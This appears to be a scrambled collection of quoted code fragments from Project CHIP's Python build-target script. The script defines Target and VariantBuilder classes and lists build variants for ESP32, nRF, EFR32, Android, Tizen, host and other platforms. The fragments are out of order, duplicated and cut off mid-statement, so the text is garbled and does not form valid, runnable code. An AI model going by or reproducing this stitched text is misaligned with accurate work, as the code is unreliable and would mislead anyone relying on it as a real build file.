app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True,", "yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield", "yield devkitc.Extend('temperature-measurement', app=Esp32App.TEMPERATURE_MEASUREMENT) yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU,", "def AllRequirementsMet(items: List[BuildVariant]) -> bool: \"\"\" Check that item.requires is", "'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() == 'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool',", "arguments are required to produce the specified build) \"\"\" def", "yield devkitc.Extend('temperature-measurement-rpc', app=Esp32App.TEMPERATURE_MEASUREMENT, enable_rpcs=True) yield esp32_target.Extend('qemu-tests', board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets():", "TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard, TizenBuilder from", "app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend( 'ota-requestor',", "Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD, app=InfineonApp.LOCK) yield target.Extend('p6-all-clusters', board=InfineonBoard.P6BOARD, app=InfineonApp.ALL_CLUSTERS)", "\"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target", "HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets", "class Target: \"\"\"Represents a build target: Has a name identifier", "starting target. \"\"\" def __init__(self, targets: List[Target] = []): #", "for s in self.substr: if s in name: return True", "by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH))", "-> bool: for a, b in combinations(items, 2): if (a.name", "board=InfineonBoard.P6BOARD, app=InfineonApp.LIGHT) def AmebaTargets(): ameba_target = Target('ameba', AmebaBuilder) yield ameba_target.Extend('amebad-all-clusters',", "for target in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK)", "name self.validator = validator self.conflicts = conflicts self.buildargs = buildargs", "builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from builders.android import AndroidApp, AndroidBoard,", "Without extra build variants yield target_native.Extend('chip-cert', app=HostApp.CERT_TOOL) yield target_native.Extend('address-resolve-tool', app=HostApp.ADDRESS_RESOLVE)", "target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota',", "in target_generators: for target in generator: ALL.append(target) # Simple targets", "target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield", "builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target = Target('tizen-arm', TizenBuilder,", "builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder", "default build variants\") test_target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in", "only for debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target", "app only yield target.Extend('nrf52840dongle-all-clusters', board=NrfBoard.NRF52840DONGLE, app=NrfApp.ALL_CLUSTERS) yield target.Extend('nrf52840dongle-light', board=NrfBoard.NRF52840DONGLE, app=NrfApp.LIGHT)", "QpgBuilder from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import", "\"\"\" available = set([item.name for item in items]) for item", "builders.nrf import NrfApp, NrfBoard, NrfConnectBuilder from builders.qpg import QpgApp, QpgBoard,", "Create(self, runner, repository_path: str, output_prefix: str, enable_flashbundle: bool): builder =", "enable_ipv4=False) yield esp32_target.Extend('c3devkit-all-clusters', board=Esp32Board.C3DevKit, app=Esp32App.ALL_CLUSTERS) devkitc = esp32_target.Extend('devkitc', board=Esp32Board.DevKitC) yield", "board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets = [] for target in targets: app_targets.append(target.Extend('lock',", "its build parameters. Arguments: suffix: appended with a \"-\" as", "__init__(self, name, builder_class, **kwargs): self.name = name self.builder_class = builder_class", "use this file except in compliance with the License. #", "variants that do not work for this target ok_variants =", "= name self.builder_class = builder_class self.glob_blacklist_reason = None self.create_kw_args =", "clone.glob_blacklist_reason = reason return clone @property def IsGlobBlacklisted(self): return self.glob_blacklist_reason", "[] # Don't cross compile some builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE))", "itertools import combinations from typing import List from builders.ameba import", "in self.targets: yield target # skip variants that do not", "'darwin'): app_targets.append(target.Extend( 'chip-tool-darwin', app=HostApp.CHIP_TOOL_DARWIN)) app_targets.append(target.Extend('chip-tool', app=HostApp.CHIP_TOOL)) app_targets.append(target.Extend('thermostat', app=HostApp.THERMOSTAT)) app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS))", "= os.path.join(output_prefix, self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason): clone", "app=HostApp.OTA_REQUESTOR, enable_ble=False)) app_targets.append(target.Extend('python-bindings', app=HostApp.PYTHON_BINDINGS)) builder = VariantBuilder() # Possible build", "yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-'", "app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL,", "yield target.Extend('light', board=Bl602Board.BL602BOARD, app=Bl602App.LIGHT) def IMXTargets(): target = Target('imx', IMXBuilder)", "and 'arm64' in target.name and '-no-interactive' not in target.name: #", "target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] # x64 linux supports cross", "yield variant_target def HostTargets(): target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native =", "= (HostBoard.NATIVE.PlatformName() == 'linux') and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile:", "target = Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets =", "yield ameba_target.Extend('amebad-all-clusters', board=AmebaBoard.AMEBAD, app=AmebaApp.ALL_CLUSTERS) yield ameba_target.Extend('amebad-light', board=AmebaBoard.AMEBAD, app=AmebaApp.LIGHT) yield ameba_target.Extend('amebad-pigweed',", "rpc def AndroidTargets(): target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM,", "app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for", "board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT)) ALL.append(Target('telink-tlsr9518adk80d-light-switch', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent", "not AllRequirementsMet(subgroup): continue # Target ready to be created -", "target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native] # x64 linux", "'Compile failure due to pw_build args not forwarded to proto", "in compliance with the License. # You may obtain a", "def AndroidTargets(): target = Target('android', AndroidBuilder) yield target.Extend('arm-chip-tool', board=AndroidBoard.ARM, app=AndroidApp.CHIP_TOOL)", "arg is used self.targets = targets[:] self.variants = [] self.glob_whitelist", "software # distributed under the License is distributed on an", "os from itertools import combinations from typing import List from", "release=True) ALL = [] target_generators = [ HostTargets(), Esp32Targets(), Efr32Targets(),", "not in available: return False return True class VariantBuilder: \"\"\"Handles", "board=Esp32Board.QEMU, app=Esp32App.TESTS) def Efr32Targets(): efr_target = Target('efr32', Efr32Builder) board_targets =", "board=AndroidBoard.X86, app=AndroidApp.CHIP_TVServer) yield target.Extend('x64-chip-tvserver', board=AndroidBoard.X64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm64-chip-tv-casting-app', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TV_CASTING_APP)", "Esp32App, Esp32Board, Esp32Builder from builders.host import HostApp, HostBoard, HostBuilder from", "**self.create_kw_args.copy()) clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs):", "target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release',", "targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets = [] # Don't cross compile some", "builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if ('-rpc-console' in target.name)", "yield target # skip variants that do not work for", "clone.glob_blacklist_reason = self.glob_blacklist_reason return clone def Extend(self, suffix, **kargs): \"\"\"Creates", "in targets: yield target.Extend('all-clusters', app=NrfApp.ALL_CLUSTERS) yield target.Extend('lock', app=NrfApp.LOCK) yield target.Extend('light',", "specified variant to be allowed for globbing. By default we", "<filename>scripts/build/build/targets.py # Copyright (c) 2021 Project CHIP Authors # #", "yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets():", "app=AndroidApp.CHIP_TOOL) yield target.Extend('x86-chip-tool', board=AndroidBoard.X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-test', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TEST) yield", "app_targets.append(target.Extend('lock', app=MbedApp.LOCK)) app_targets.append(target.Extend('light', app=MbedApp.LIGHT)) app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell',", "builder_class self.glob_blacklist_reason = None self.create_kw_args = kwargs def Clone(self): \"\"\"Creates", "yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True)", "**kargs): \"\"\"Creates a clone of the current object extending its", "yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat', app=IMXApp.THERMOSTAT) yield target.Extend('all-clusters-app', app=IMXApp.ALL_CLUSTERS) yield", "= variant_target.Extend( option.name, **option.buildargs) # Only a few are whitelisted", "app=IMXApp.ALL_CLUSTERS) yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release',", "with the License. # You may obtain a copy of", "target def Bl602Targets(): target = Target('bl602', Bl602Builder) yield target.Extend('light', board=Bl602Board.BL602BOARD,", "TizenBoard, TizenBuilder from builders.bl602 import Bl602App, Bl602Board, Bl602Builder from builders.imx", "def __init__(self, name, builder_class, **kwargs): self.name = name self.builder_class =", "continue if not AllRequirementsMet(subgroup): continue # Target ready to be", "[], **buildargs): self.name = name self.validator = validator self.conflicts =", "builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True), builder.AppendVariant(name=\"test\",", "board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.SWITCH)) # have a consistent order overall ALL.sort(key=lambda t:", "clone of the current object extending its build parameters. Arguments:", "target in app_targets: if ('-rpc-console' in target.name) or ('-python-bindings' in", "in the given list \"\"\" available = set([item.name for item", "# Single-variant builds yield target else: builder.targets.append(target) for target in", "self.name) builder.enable_flashbundle(enable_flashbundle) return builder def GlobBlacklist(self, reason): clone = self.Clone()", "if cross_compile and 'chip-tool' in target.name and 'arm64' in target.name", "= Target(HostBoard.NATIVE.PlatformName(), HostBuilder) target_native = target.Extend(HostBoard.NATIVE.BoardName(), board=HostBoard.NATIVE) targets = [target_native]", "- no conflicts variant_target = target.Clone() for option in subgroup:", "board=TizenBoard.ARM) builder.targets.append(target.Extend('light', app=TizenApp.LIGHT)) for target in builder.AllVariants(): yield target def", "target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if '-nrf5340dk-' in rpc.name: rpc = rpc.GlobBlacklist(", "Target('qpg', QpgBuilder) yield target.Extend('lock', board=QpgBoard.QPG6105, app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT)", "express or implied. # See the License for the specific", "app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only on demand build\") def cc13x2x7_26x2x7Targets(): target =", "except in compliance with the License. # You may obtain", "conflicts self.buildargs = buildargs self.requires = requires def HasConflicts(items: List[BuildVariant])", "MbedTargets(), InfineonTargets(), AmebaTargets(), K32WTargets(), cc13x2x7_26x2x7Targets(), Cyw30739Targets(), QorvoTargets(), TizenTargets(), Bl602Targets(), IMXTargets(),", "builder.AllVariants(): if cross_compile and 'chip-tool' in target.name and 'arm64' in", "yield target.Extend('lock-mtd', app=cc13x2x7_26x2x7App.LOCK, openthread_ftd=False) yield target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER)", "that do not work for this target ok_variants = [", "current object extending its build parameters. Arguments: suffix: appended with", "in target.name and 'arm64' in target.name and '-no-interactive' not in", "app_targets.append( target_native.Extend('nl-test-runner', app=HostApp.NL_TEST_RUNNER)) for target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS))", "builder.AppendVariant(name=\"test\", extra_tests=True), builder.WhitelistVariantNameForGlob('no-interactive-ipv6only') builder.WhitelistVariantNameForGlob('ipv6only') for target in app_targets: if ('-rpc-console'", "Copyright (c) 2021 Project CHIP Authors # # Licensed under", "clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason += reason else: clone.glob_blacklist_reason", "# Licensed under the Apache License, Version 2.0 (the \"License\");", "'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in app_targets:", "board=QpgBoard.QPG6105, app=QpgApp.PERSISTENT_STORAGE) def TizenTargets(): # Possible build variants. # NOTE:", "Target('imx', IMXBuilder) yield target.Extend('chip-tool', app=IMXApp.CHIP_TOOL) yield target.Extend('lighting-app', app=IMXApp.LIGHT) yield target.Extend('thermostat',", "Cyw30739Board, Cyw30739Builder from builders.efr32 import Efr32App, Efr32Board, Efr32Builder from builders.esp32", "for target in targets: app_targets.append(target.Extend( 'all-clusters', app=HostApp.ALL_CLUSTERS)) if (HostBoard.NATIVE.PlatformName() ==", "requested'), efr_target.Extend('brd4304a', board=Efr32Board.BRD4304A).GlobBlacklist( 'only user requested') ] builder = VariantBuilder()", "use_tsan=True), builder.AppendVariant(name=\"asan\", conflicts=['tsan'], use_asan=True), builder.AppendVariant(name=\"libfuzzer\", requires=[ \"clang\"], use_libfuzzer=True), builder.AppendVariant(name=\"clang\", use_clang=True),", "permissions and # limitations under the License. import os from", "('-python-bindings' in target.name) or ('nl-test-runner' in target.name): # Single-variant builds", "for variant_count in range(1, len(ok_variants) + 1): for subgroup in", "CONDITIONS OF ANY KIND, either express or implied. # See", "yield target.Extend('ota-provider-app', app=IMXApp.OTA_PROVIDER) yield target.Extend('chip-tool-release', app=IMXApp.CHIP_TOOL, release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT,", "Target('mbed', MbedBuilder) targets = [ target.Extend('CY8CPROTO_062_4343W', board=MbedBoard.CY8CPROTO_062_4343W), ] app_targets =", "for target in app_targets: yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist(", "app=Cyw30739App.OTA_REQUESTOR, progress_logging=False) def QorvoTargets(): target = Target('qpg', QpgBuilder) yield target.Extend('lock',", "release=True) yield target.Extend('lock-release', app=K32WApp.LOCK, release=True) yield target.Extend('lock-low-power-release', app=K32WApp.LOCK, low_power=True, release=True).GlobBlacklist(\"Only", "board=NrfBoard.NRF52840DK), ] # Enable nrf52840dongle for all-clusters and lighting app", "variants based on a starting target. \"\"\" def __init__(self, targets:", "yield target def Bl602Targets(): target = Target('bl602', Bl602Builder) yield target.Extend('light',", "self.name = name self.builder_class = builder_class self.glob_blacklist_reason = None self.create_kw_args", "WhitelistVariantNameForGlob(self, name): \"\"\" Whitelist the specified variant to be allowed", "self.glob_whitelist: if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default build", "target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder, board=Cyw30739Board.CYW930739M2EVB_01, app=Cyw30739App.LIGHT) yield", "= VariantBuilder() builder.AppendVariant(name=\"no-ble\", enable_ble=False) builder.AppendVariant(name=\"no-wifi\", enable_wifi=False) builder.AppendVariant(name=\"asan\", use_asan=True) target =", "release=True) yield target.Extend('lighting-app-release', app=IMXApp.LIGHT, release=True) yield target.Extend('thermostat-release', app=IMXApp.THERMOSTAT, release=True) yield", "**kargs: arguments needed to produce the new build variant \"\"\"", "ALL.append(target) # Simple targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder,", "app=NrfApp.PUMP) yield target.Extend('pump-controller', app=NrfApp.PUMP_CONTROLLER) rpc = target.Extend('light-rpc', app=NrfApp.LIGHT, enable_rpcs=True) if", "Target('efr32', Efr32Builder) board_targets = [ efr_target.Extend('brd4161a', board=Efr32Board.BRD4161A), efr_target.Extend('brd4163a', board=Efr32Board.BRD4163A).GlobBlacklist( 'only", "Efr32Board, Efr32Builder from builders.esp32 import Esp32App, Esp32Board, Esp32Builder from builders.host", "for o in subgroup]) if name not in self.glob_whitelist: if", "target.Extend('pump', app=cc13x2x7_26x2x7App.PUMP) yield target.Extend('pump-controller', app=cc13x2x7_26x2x7App.PUMP_CONTROLLER) yield target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell',", "if clone.glob_blacklist_reason: clone.glob_blacklist_reason += \", \" clone.glob_blacklist_reason += reason else:", "work for this target ok_variants = [ v for v", "yield target.Extend('androidstudio-arm-chip-tool', board=AndroidBoard.AndroidStudio_ARM, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-arm64-chip-tool', board=AndroidBoard.AndroidStudio_ARM64, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x86-chip-tool',", "builder.targets.append(board_target.Extend( 'window-covering', app=Efr32App.WINDOW_COVERING)) builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append(", "target.name: # Interactive builds will not compile by default on", "'only user requested'), efr_target.Extend('brd4164a', board=Efr32Board.BRD4164A).GlobBlacklist( 'only user requested'), efr_target.Extend('brd4166a', board=Efr32Board.BRD4166A).GlobBlacklist(", "+ '-tests', board=board, app=HostApp.TESTS) def Esp32Targets(): esp32_target = Target('esp32', Esp32Builder)", "TizenTargets(): # Possible build variants. # NOTE: The number of", "be created - no conflicts variant_target = target.Clone() for option", "] # Enable nrf52840dongle for all-clusters and lighting app only", "builder.targets.append(board_target.Extend( 'switch', app=Efr32App.SWITCH)) builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock',", "arguments needed to produce the new build variant \"\"\" clone", "str): for s in self.substr: if s in name: return", "target.Extend('androidstudio-x86-chip-tool', board=AndroidBoard.AndroidStudio_X86, app=AndroidApp.CHIP_TOOL) yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64,", "def K32WTargets(): target = Target('k32w', K32WBuilder) yield target.Extend('light-ota-se', app=K32WApp.LIGHT, release=True,", "name, builder_class, **kwargs): self.name = name self.builder_class = builder_class self.glob_blacklist_reason", "validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for target in", "build variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\")", "on demand build\") def cc13x2x7_26x2x7Targets(): target = Target('cc13x2x7_26x2x7', cc13x2x7_26x2x7Builder) yield", "if ('-rpc-console' in target.name) or ('-python-bindings' in target.name) or ('nl-test-runner'", "import AndroidApp, AndroidBoard, AndroidBuilder from builders.cc13x2x7_26x2x7 import cc13x2x7_26x2x7App, cc13x2x7_26x2x7Builder from", "InfineonBoard, InfineonBuilder from builders.k32w import K32WApp, K32WBuilder from builders.mbed import", "target.Extend('all-clusters', app=cc13x2x7_26x2x7App.ALL_CLUSTERS) yield target.Extend('shell', app=cc13x2x7_26x2x7App.SHELL) def Cyw30739Targets(): yield Target('cyw30739-cyw930739m2evb_01-light', Cyw30739Builder,", "app_targets.append(target.Extend('minmdns', app=HostApp.MIN_MDNS)) app_targets.append(target.Extend('light', app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider',", "variants\") yield target_native.Extend('address-resolve-tool-platform-mdns-ipv6only', app=HostApp.ADDRESS_RESOLVE, use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target", "app=QpgApp.LOCK) yield target.Extend('light', board=QpgBoard.QPG6105, app=QpgApp.LIGHT) yield target.Extend('shell', board=QpgBoard.QPG6105, app=QpgApp.SHELL) yield", "in combinations(ok_variants, variant_count): if HasConflicts(subgroup): continue if not AllRequirementsMet(subgroup): continue", "'arm64' in target.name and '-no-interactive' not in target.name: # Interactive", "rpc.name: rpc = rpc.GlobBlacklist( 'Compile failure due to pw_build args", "bool: \"\"\" Check that item.requires is satisfied for all items", "import HostApp, HostBoard, HostBuilder from builders.infineon import InfineonApp, InfineonBoard, InfineonBuilder", "name identifier plus parameters on how to build it (what", "here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True) builder.WhitelistVariantNameForGlob('rpc') for", "self.substr: if s in name: return True return False class", "board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS) yield esp32_target.Extend('m5stack-all-clusters-ipv6only', board=Esp32Board.M5Stack, app=Esp32App.ALL_CLUSTERS, enable_ipv4=False) yield esp32_target.Extend('m5stack-all-clusters-rpc', board=Esp32Board.M5Stack,", "and (HostBoard.NATIVE.BoardName() != HostBoard.ARM64.BoardName()) if cross_compile: targets.append(target.Extend('arm64', board=HostBoard.ARM64)) app_targets =", "no conflicts variant_target = target.Clone() for option in subgroup: variant_target", "IMXApp, IMXBuilder class Target: \"\"\"Represents a build target: Has a", "__init__(self, name: str, validator=AcceptAnyName(), conflicts: List[str] = [], requires: List[str]", "List from builders.ameba import AmebaApp, AmebaBoard, AmebaBuilder from builders.android import", "is not part of the default sysroot yield target.GlobBlacklist('Arm crosscompile", "does not support libreadline-dev') else: yield target # Without extra", "the current object extending its build parameters. Arguments: suffix: appended", "app_targets.append(target.Extend( 'all-clusters', app=MbedApp.ALL_CLUSTERS)) app_targets.append(target.Extend('pigweed', app=MbedApp.PIGWEED)) app_targets.append(target.Extend('shell', app=MbedApp.SHELL)) for target in", "cc13x2x7_26x2x7Builder from builders.cyw30739 import Cyw30739App, Cyw30739Board, Cyw30739Builder from builders.efr32 import", "yield target.Extend('release', profile=MbedProfile.RELEASE) yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging", "board=HostBoard.NATIVE) targets = [target_native] # x64 linux supports cross compile", "clone of self.\"\"\" clone = Target(self.name, self.builder_class, **self.create_kw_args.copy()) clone.glob_blacklist_reason =", "default arg is used self.targets = targets[:] self.variants = []", "'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') def InfineonTargets(): target = Target('infineon', InfineonBuilder) yield target.Extend('p6-lock', board=InfineonBoard.P6BOARD,", "requirement in item.requires: if requirement not in available: return False", "yield target.Extend('develop', profile=MbedProfile.DEVELOP).GlobBlacklist( 'Compile only for debugging purpose - '", "in subgroup: variant_target = variant_target.Extend( option.name, **option.buildargs) # Only a", "self.variants = [] self.glob_whitelist = [] def WhitelistVariantNameForGlob(self, name): \"\"\"", "**args): \"\"\" Add another variant to accepted variants. Arguments are", "to produce the specified build) \"\"\" def __init__(self, name, builder_class,", "debugging purpose - ' 'https://os.mbed.com/docs/mbed-os/latest/program-setup/build-profiles-and-rules.html') yield target.Extend('debug', profile=MbedProfile.DEBUG).GlobBlacklist( 'Compile only", "-> bool: \"\"\" Check that item.requires is satisfied for all", "if not variant_target.IsGlobBlacklisted: variant_target = variant_target.GlobBlacklist( 'Reduce default build variants')", "builds app_targets.append( target_native.Extend('rpc-console', app=HostApp.RPC_CONSOLE)) app_targets.append( target_native.Extend('tv-app', app=HostApp.TV_APP)) app_targets.append( target_native.Extend('tv-casting-app', app=HostApp.TV_CASTING_APP))", "builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import TizenApp, TizenBoard,", "yield target.Extend('androidstudio-x64-chip-tool', board=AndroidBoard.AndroidStudio_X64, app=AndroidApp.CHIP_TOOL) yield target.Extend('arm64-chip-tvserver', board=AndroidBoard.ARM64, app=AndroidApp.CHIP_TVServer) yield target.Extend('arm-chip-tvserver',", "board=AndroidBoard.ARM, app=AndroidApp.CHIP_TV_CASTING_APP) def MbedTargets(): target = Target('mbed', MbedBuilder) targets =", "range(1, len(ok_variants) + 1): for subgroup in combinations(ok_variants, variant_count): if", "is exponential here builder.AppendVariant(name=\"rpc\", validator=AcceptNameWithSubstrings( ['-light', '-lock']), enable_rpcs=True) builder.AppendVariant(name=\"with-ota-requestor\", enable_ota_requestor=True)", "= Target(HostBoard.NATIVE.PlatformName(), HostBuilder) for board in [HostBoard.NATIVE, HostBoard.FAKE]: yield test_target.Extend(board.BoardName()", "import combinations from typing import List from builders.ameba import AmebaApp,", "all items in the given list \"\"\" available = set([item.name", "release=True, disable_ble=True, se05x=True).GlobBlacklist(\"Only on demand build\") yield target.Extend('light-release-no-ota', app=K32WApp.LIGHT, tokenizer=True,", "builder.targets.append(board_target.Extend( 'unit-test', app=Efr32App.UNIT_TEST)) builder.targets.append( board_target.Extend('light', app=Efr32App.LIGHT)) builder.targets.append(board_target.Extend('lock', app=Efr32App.LOCK)) # Possible", "def AppendVariant(self, **args): \"\"\" Add another variant to accepted variants.", "app=HostApp.LIGHT)) app_targets.append(target.Extend('lock', app=HostApp.LOCK)) app_targets.append(target.Extend('shell', app=HostApp.SHELL)) app_targets.append(target.Extend( 'ota-provider', app=HostApp.OTA_PROVIDER, enable_ble=False)) app_targets.append(target.Extend(", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by", "from builders.telink import TelinkApp, TelinkBoard, TelinkBuilder from builders.tizen import TizenApp,", "Simple targets added one by one ALL.append(Target('telink-tlsr9518adk80d-light', TelinkBuilder, board=TelinkBoard.TLSR9518ADK80D, app=TelinkApp.LIGHT))", "builder_class, **kwargs): self.name = name self.builder_class = builder_class self.glob_blacklist_reason =", "for item in items]) for item in items: for requirement", "= [], requires: List[str] = [], **buildargs): self.name = name", "def HasConflicts(items: List[BuildVariant]) -> bool: for a, b in combinations(items,", "for the given targets. Handles conflict resolution between build variants", "use_platform_mdns=True, enable_ipv4=False).GlobBlacklist(\"Reduce default build variants\") test_target = 